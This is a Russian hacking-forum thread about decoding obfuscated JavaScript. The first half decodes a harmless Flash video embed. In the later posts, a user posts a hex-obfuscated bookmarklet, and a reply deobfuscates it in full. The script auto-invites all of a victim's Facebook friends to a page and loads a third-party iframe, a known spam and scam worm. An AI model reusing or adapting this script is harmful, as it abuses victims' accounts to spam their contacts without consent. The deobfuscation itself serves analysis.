ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Расшифровка, JavaScript
  #1  
Старый 25.02.2009, 17:50
Аватар для hNick
hNick
Новичок
Регистрация: 28.04.2008
Сообщений: 10
Провел на форуме:
135398

Репутация: 4
Post Расшифровка, JavaScript

Добрый день, необходимо расшифровать один JavaScript , а именно

Цитата:
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%7 3%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B% 74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E %6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%2 9%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43% 68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64 %65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%6 5%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D% 74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E %77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2 B%74%29%7D"));d(unescape("%08<tkf->< gwpv ?lggpaqnnwdumnnc q{cunc ?qqgaacvrkpaqumnnc gqncd?923!$913!$gnddwjq9roc$gqncd?vpcvqmvwc9roc$gw pv?javgpvqpgtm\"9roc$2:6?jvfku9roc$2:6?vjekgj9roc$ 923!$913!$noz,kmpge-nckpgq-pgtpgq-vgl,czonkd--8rvvj?gnkd9roc$2:1?vjekgj{cnrqkf9roc$ ?qpctjqcnd\"jqcnd/gtcuiamjq/z-lmkvcaknrrc?gr{v\"2:6?vjekgj\"2:6?jvfku\"duq,pgqpg {cnrckfgo-mgfkt-pgtpgq-vgl,czonkd--8rvvj?apq\"FG@OG>< pgvlga ?leknc\"tkf>"));
и, опишите пожалуйста, принцип / метод расшифровки.
 
Ответить с цитированием

  #2  
Старый 25.02.2009, 18:06
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

function d(s){
r=new Array();t="";
j=0;
for(i=s.length-1;i>0;i--){
t+=String.fromCharCode(s.charCodeAt(i)^2);
if(t.length>80){r[j++]=t;t=""}
}
document.write(r.join("")+t)
}

Это первая часть до ;d
 
Ответить с цитированием

  #3  
Старый 25.02.2009, 18:09
Аватар для hNick
hNick
Новичок
Регистрация: 28.04.2008
Сообщений: 10
Провел на форуме:
135398

Репутация: 4
Post

Цитата:
Сообщение от Pashkela  
function d(s){
r=new Array();t="";
j=0;
for(i=s.length-1;i>0;i--){
t+=String.fromCharCode(s.charCodeAt(i)^2);
if(t.length>80){r[j++]=t;t=""}
}
document.write(r.join("")+t)
}

Это первая часть до ;d
ну это то понятно =), я расшифровал тупым удалением части кода, из второй части, после чего он мне просто вывел ту часть которая осталась, но без закрывающего тега.
 
Ответить с цитированием

  #4  
Старый 25.02.2009, 18:15
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Конечный результат
Код HTML:
<DIV align="center">
<EMBED src="http://filmxa.net/server/video/mediaplayerser.swf" width="480" height="480" 
type="application/x-shockwave-flash" 
flashvars="&displayheight=380&file=http://filmxa.net/server/serial/ger" oi.xml
&amp;height="480&width=480&" overstretch="true&autostart=false&shuffle=false\"allowscriptaccess=\"always\"allowfullscreen=\"true\"">
</DIV>

Последний раз редактировалось AkyHa_MaTaTa; 25.02.2009 в 18:18..
 
Ответить с цитированием

  #5  
Старый 25.02.2009, 18:16
Аватар для hNick
hNick
Новичок
Регистрация: 28.04.2008
Сообщений: 10
Провел на форуме:
135398

Репутация: 4
По умолчанию

Цитата:
Сообщение от AkyHa_MaTaTa  
Конечный результат
Код HTML:
<DIV align="center"><EMBED src="http://filmxa.net/server/video/mediaplayerser.swf" width="480" height="480" type="application/x-shockwave-flash" flashvars="&displayheight=380&file=http://filmxa.net/server/serial/ger" oi.xml
&amp;height="480&width=480&" overstretch="tr\"ue&autostart=false&shuffle
=false\"allowscriptaccess=\"always\"allowfullscreen=\"true\""></DIV>
угук, он самый, мне скорее не только результат интересен, а хотелось бы про метод послушать
 
Ответить с цитированием

  #6  
Старый 25.02.2009, 18:31
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Вот так это делается:

Расшифровываем саму функцию (до d(unescape)):

Код:
<script>
alert(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65 %28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));
</script>
Далее уже немного изменяем алгоритм функции, чтобы была возможность посмотреть, чего она там нашифровала:

Код:
<script>
function d(s){
r=new Array();t="";
j=0;
for(i=s.length-1;i>0;i--){
t+=String.fromCharCode(s.charCodeAt(i)^2);
if(t.length>80){r[j++]=t;t="";}
}
//document.write(r.join("")+t);
var code=r.join("")+t;
return code;
}

alert(d(unescape("%08<tkf-><gwpv?lggpaqnnwdumnncq{cunc?qqgaacvrkpaqumnncgqncd?923!$913!$gnddwjq9roc$gqncd?vpcvqmvwc9roc$gwpv?javgpvqpgtm\"9roc$2:6?jvfku9roc$2:6?vjekgj9roc$923!$913!$noz,kmpge-nckpgq-pgtpgq-vgl,czonkd--8rvvj?gnkd9roc$2:1?vjekgj{cnrqkf9roc$?qpctjqcnd\"jqcnd/gtcuiamjq/z-lmkvcaknrrc?gr{v\"2:6?vjekgj\"2:6?jvfku\"duq,pgqpg{cnrckfgo-mgfkt-pgtpgq-vgl,czonkd--8rvvj?apq\"FG@OG><pgvlga?leknc\"tkf>"))); 

</script>

Последний раз редактировалось Pashkela; 25.02.2009 в 18:42..
 
Ответить с цитированием

  #7  
Старый 08.05.2010, 17:56
Аватар для s-k-y
s-k-y
Новичок
Регистрация: 25.02.2010
Сообщений: 1
Провел на форуме:
30391

Репутация: 0
По умолчанию

а вот с этим не поможете?

javascript: var _89f8x0 = ["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C", "\x61\x70\x70\x31\x31\x30\x30\x37\x30\x36\x33\x30\ x35\x32\x5f\x6d\x61\x69\x6e\x62\x69\x74
", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\ x49\x64", "\x3c\x61\x20\x69\x64\x3d\x22\x73\x75\x67\x67\x65\ x73\x74\x22\x20\x68\x72\x65\x66\x3d\x22\x23\x22\x2 0\x61\x6a\x61\x78\x69\x66\x79\x3d\x22\x2f\x61\x6a\ x61\x78\x2f\x73\x6f\x63\x69\x61\x6c\x5f\x67\x72\x6 1\x70\x68\x2f\x69\x6e\x76\x69\x74\x65\x5f\x64\x69\ x61\x6c\x6f\x67\x2e\x70\x68\x70\x3f\x63\x6c\x61\x7 3\x73\x3d\x46\x61\x6e\x4d\x61\x6e\x61\x67\x65\x72\ x26\x61\x6d\x70\x3b\x6e\x6f\x64\x65\x5f\x69\x64\x3 d\x31\x32\x34\x38\x33\x37\x30\x36\x34\x31\x39\x33\ x30\x34\x30\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x2 0\x70\x72\x6f\x66\x69\x6c\x65\x5f\x61\x63\x74\x69\ x6f\x6e\x20\x61\x63\x74\x69\x6f\x6e\x73\x70\x72\x6 f\x5f\x61\x22\x20\x72\x65\x6c\x3d\x22\x64\x69\x61\ x6c\x6f\x67\x2d\x70\x6f\x73\x74\x22\x3e\x53\x75\x6 7\x67\x65\x73\x74\x20\x74\x6f\x20\x46\x72\x69\x65\ x6e\x64\x73\x3c\x2f\x61\x3e", "\x73\x75\x67\x67\x65\x73\x74", "\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73" , "\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74" , "\x63\x6C\x69\x63\x6B", "\x69\x6E\x69\x74\x45\x76\x65\x6E\x74", "\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\ x74", "\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C", "\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\ x6F\x72\x6D", "\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\ x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x6 5\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70", "\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\ x67"];
void(document[_89f8x0[2]](_89f8x0[1])[_89f8x0[0]] = _89f8x0[3]);
var ss = document[_89f8x0[2]](_89f8x0[4]);
var c = document[_89f8x0[6]](_89f8x0[5]);
c[_89f8x0[8]](_89f8x0[7], true, true);
void(ss[_89f8x0[9]](c));
void(setTimeout(function () {
fs[_89f8x0[10]]();
}, 4000));
void(setTimeout(function () {
SocialGraphManager[_89f8x0[13]](_89f8x0[11], _89f8x0[12]);
}, 5000));
void(document[_89f8x0[2]](_89f8x0[1])[_89f8x0[0]] = '
\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x 22\x68\x74\x74\x70\x3a\x2f\x2f\x61\x6e\x6f\x74\x68 \x65\x72\x31\x32\x66\x61\x63\x65\x62\x6f\x6f\x6b\x 66\x61\x69\x6c\x73\x2e\x62\x6c\x69\x6e\x6b\x77\x65 \x62\x2e\x63\x6f\x6d\x2f\x22\x20\x73\x74\x79\x6c\x 65\x3d\x22\x77\x69\x64\x74\x68\x3a\x20\x37\x30\x30 \x70\x78\x3b\x20\x68\x65\x69\x67\x68\x74\x3a\x20\x 34\x35\x30\x70\x78\x3b\x22\x20\x66\x72\x61\x6d\x65 \x62\x6f\x72\x64\x65\x72\x3d\x30\x20\x73\x63\x72\x 6f\x6c\x6c\x69\x6e\x67\x3d\x22\x6e\x6f\x22\x3e\x3c \x2f\x69\x66\x72\x61\x6d\x65\x3e ');;;;
 
Ответить с цитированием

  #8  
Старый 08.05.2010, 18:14
Аватар для eLWAux
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

s-k-y:

PHP код:
<script>
var 
_89f8x0 = [
    
"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
    
"\x61\x70\x70\x31\x31\x30\x30\x37\x30\x36\x33\x30\x35\x32\x5f\x6d\x61\x69\x6e\x62\x69\x74",
    
"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
    
"\x3c\x61\x20\x69\x64\x3d\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3d\x22\x23\x22\x20\x61\x6a\x61\x78\x69\x66\x79\x3d\x22\x2f\x61\x6a\x61\x78\x2f\x73\x6f\x63\x69\x61\x6c\x5f\x67\x72\x61\x70\x68\x2f\x69\x6e\x76\x69\x74\x65\x5f\x64\x69\x61\x6c\x6f\x67\x2e\x70\x68\x70\x3f\x63\x6c\x61\x73\x73\x3d\x46\x61\x6e\x4d\x61\x6e\x61\x67\x65\x72\x26\x61\x6d\x70\x3b\x6e\x6f\x64\x65\x5f\x69\x64\x3d\x31\x32\x34\x38\x33\x37\x30\x36\x34\x31\x39\x33\x30\x34\x30\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x20\x70\x72\x6f\x66\x69\x6c\x65\x5f\x61\x63\x74\x69\x6f\x6e\x20\x61\x63\x74\x69\x6f\x6e\x73\x70\x72\x6f\x5f\x61\x22\x20\x72\x65\x6c\x3d\x22\x64\x69\x61\x6c\x6f\x67\x2d\x70\x6f\x73\x74\x22\x3e\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6f\x20\x46\x72\x69\x65\x6e\x64\x73\x3c\x2f\x61\x3e",
    
"\x73\x75\x67\x67\x65\x73\x74",
    
"\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73",
    
"\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74",
    
"\x63\x6C\x69\x63\x6B",
    
"\x69\x6E\x69\x74\x45\x76\x65\x6E\x74",
    
"\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74",
    
"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
    
"\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
    
"\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
    
"\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
    
// _89f8x0[2] = getElementById
// _89f8x0[1] = app11007063052_mainbit
// _89f8x0[0] = innerHTML
// _89f8x0[3] = <a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=124837064193040" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>
voiddocument[_89f8x0[2]](_89f8x0[1])[_89f8x0[0] ] = _89f8x0[3] );
// document[ getElementById ](app11007063052_mainbit)[innerHTML] =
// <a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=124837064193040" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>
     
var ss document[_89f8x0[2]](_89f8x0[4]);
// var ss = document[ getElementById ]( suggest );
var document[_89f8x0[6]](_89f8x0[5]);
// var c = document[createEvent](MouseEvents);
     
c[_89f8x0[8]](_89f8x0[7], truetrue);
// c[initEvent](click, true, true);
     
void(ss[_89f8x0[9]](c));
// ss[dispatchEvent](c);
     
void(setTimeout(function () {
    
fs[_89f8x0[10]]();
    
// fs[select_all]();
}, 4000));
     
void(setTimeout(function () {
    
SocialGraphManager[_89f8x0[13]](_89f8x0[11], _89f8x0[12]);
    
// SocialGraphManager[submitDialog](sgm_invite_form, '/ajax/social_graph/invite_dialog.php');
}, 5000));

void(document[_89f8x0[2]](_89f8x0[1])[_89f8x0[0]] = '\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x61\x6e\x6f\x74\x68\x65\x72\x31\x32\x66\x61\x63\x65\x62\x6f\x6f\x6b\x66\x61\x69\x6c\x73\x2e\x62\x6c\x69\x6e\x6b\x77\x65\x62\x2e\x63\x6f\x6d\x2f\x22\x20\x73\x74\x79\x6c\x65\x3d\x22\x77\x69\x64\x74\x68\x3a\x20\x37\x30\x30\x70\x78\x3b\x20\x68\x65\x69\x67\x68\x74\x3a\x20\x34\x35\x30\x70\x78\x3b\x22\x20\x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x30\x20\x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\x22\x6e\x6f\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');
/*
document[ getElementById ](app11007063052_mainbit)[innerHTML] =
<iframe src="http://another12facebookfails.blinkweb.com/" style="width: 700px; height: 450px;" frameborder=0 scrolling="no"></iframe>
*/
</script
js-script:
PHP код:
<script>
documentgetElementById ](app11007063052_mainbit)[innerHTML] = '<a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=124837064193040" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>';
     
var 
ss documentgetElementById ]( suggest );
var 
document[createEvent](MouseEvents);
    
c[initEvent](clicktruetrue);
    
ss[dispatchEvent](c);
     
void(setTimeout(function () {
    
fs[select_all]();
}, 
4000));
     
void(setTimeout(function () {
    
SocialGraphManager[submitDialog](sgm_invite_form'/ajax/social_graph/invite_dialog.php');
}, 
5000));

documentgetElementById ](app11007063052_mainbit)[innerHTML] = '<iframe src="http://another12facebookfails.blinkweb.com/" style="width: 700px; height: 450px;" frameborder=0 scrolling="no"></iframe>';
</
script
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Основы JavaScript .Slip Авторские статьи 20 16.05.2006 23:44
Система авторизации на Javascript Xex Авторские статьи 3 26.04.2006 13:42
Books JS FRAGNATIC PHP, PERL, MySQL, JavaScript 0 11.08.2005 16:57
Bypassing JavaScript Filters the Flash! Attack k00p3r Чужие Статьи 0 12.07.2005 16:11



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ